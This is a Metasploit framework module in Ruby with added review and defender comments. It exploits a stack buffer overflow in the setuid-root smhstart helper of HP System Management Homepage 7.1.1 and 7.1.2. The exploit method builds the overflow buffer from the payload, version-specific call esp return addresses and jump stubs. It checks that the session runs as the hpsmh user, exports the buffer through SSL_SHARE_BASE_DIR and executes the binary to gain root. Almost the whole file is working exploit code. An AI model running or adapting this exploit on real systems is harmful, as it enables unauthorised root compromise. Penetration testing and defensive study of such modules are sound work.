##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  # Local privilege escalation for HP System Management Homepage (SMH) <= 7.1.2.
  # The setuid-root `smhstart` helper overflows a stack buffer when the
  # SSL_SHARE_BASE_DIR environment variable is oversized (see Description).
  # Runs from an existing shell session that is already the `hpsmh` user and
  # executes the setuid binary with a crafted environment.
  #
  # Defender-relevant artefacts (all visible in #exploit below): a shell owned
  # by `hpsmh` exporting an unusually long SSL_SHARE_BASE_DIR and then
  # executing smhstart from the configured directory.
  Rank = NormalRanking

  include Msf::Exploit::EXE
  include Msf::Post::File

  include Msf::Exploit::Local::Linux

  # Registers module metadata (targets, payload constraints, references) and
  # the single operator option `smhstartDir`.
  #
  # @param info [Hash] metadata the framework merges into this module
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'HP System Management Homepage Local Privilege Escalation',
          'Description' => %q{
            Versions of HP System Management Homepage <= 7.1.2 include a setuid root
            smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR
            env variable.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'agix' # @agixid # Vulnerability discovery and Metasploit module
          ],
          'Platform' => [ 'linux' ],
          'SessionTypes' => [ 'shell' ],
          'Payload' => {
            # Max encoded payload size; #exploit places the payload first in the buffer.
            'Space' => 227,
            'BadChars' => "\x00\x22"
          },
          'References' => [
            ['OSVDB', '91990']
          ],
          # Each target carries a version-specific `call esp` address and the
          # length of trailing random padding used by #exploit.
          'Targets' => [
            [
              'HP System Management Homepage 7.1.1',
              {
                'Arch' => ARCH_X86,
                'CallEsp' => 0x080c86eb, # call esp
                'Offset' => 58
              }
            ],
            [
              'HP System Management Homepage 7.1.2',
              {
                'Arch' => ARCH_X86,
                'CallEsp' => 0x080c8b9b, # call esp
                'Offset' => 58
              }
            ],
          ],
          'DefaultOptions' => {
            # Framework payload option: prefixes the payload with a setuid stub
            # so the spawned shell keeps the elevated uid.
            'PrependSetuid' => true
          },
          'DefaultTarget' => 0,
          'DisclosureDate' => '2013-03-30',
          'Notes' => {
            'Reliability' => UNKNOWN_RELIABILITY,
            'Stability' => UNKNOWN_STABILITY,
            'SideEffects' => UNKNOWN_SIDE_EFFECTS
          }
        }
      )
    )
    register_options([
      # Directory containing the setuid smhstart binary; interpolated into a
      # shell command in #exploit, so this is operator-controlled input.
      OptString.new('smhstartDir', [ true, 'smhstart directory', '/opt/hp/hpsmh/sbin/' ])
    ])
  end

  # Builds the overflow buffer, checks that the session user is `hpsmh`,
  # exports the buffer through SSL_SHARE_BASE_DIR and executes smhstart.
  #
  # Buffer layout, in order: encoded payload, target['CallEsp'] packed as a
  # little-endian dword, a 6-byte `add esp` stub, a 5-byte `jmp` stub, then
  # target['Offset'] bytes of random alphabetic padding.
  #
  # @raise via fail_with (Failure::NoAccess) when `id -un` is not 'hpsmh'
  def exploit
    # NOTE(review): `exploit = pl` below aliases this string and every `<<`
    # mutates it in place. If the framework caches payload.encoded, a `.dup`
    # here would avoid altering the cached value — confirm against the Payload API.
    pl = payload.encoded
    padding = rand_text_alpha(target['Offset'])
    ret = [target['CallEsp']].pack('V')
    # Local variable shadows the method name #exploit; a name such as `buf`
    # would read more clearly.
    exploit = pl
    exploit << ret
    exploit << "\x81\xc4\x11\xff\xff\xff" # add esp, 0xffffff11
    exploit << "\xe9\x0e\xff\xff\xff" # jmp => beginning of pl
    exploit << padding
    # Base64 keeps the raw bytes out of the shell command line so no quoting
    # of the buffer itself is needed.
    exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better
    # smhstart is only reachable as the hpsmh service account; abort otherwise.
    id = cmd_exec('id -un')
    if id != 'hpsmh'
      fail_with(Failure::NoAccess, "You are #{id}, you must be hpsmh to exploit this")
    end
    # Assumes both cmd_exec calls run in the same shell (SessionTypes is
    # 'shell') so the exported variable is still set for the second command.
    cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)")
    # smhstartDir is interpolated unquoted; with the default trailing slash the
    # path becomes '//smhstart', which the shell resolves normally.
    cmd_exec("#{datastore['smhstartDir']}/smhstart")
  end
end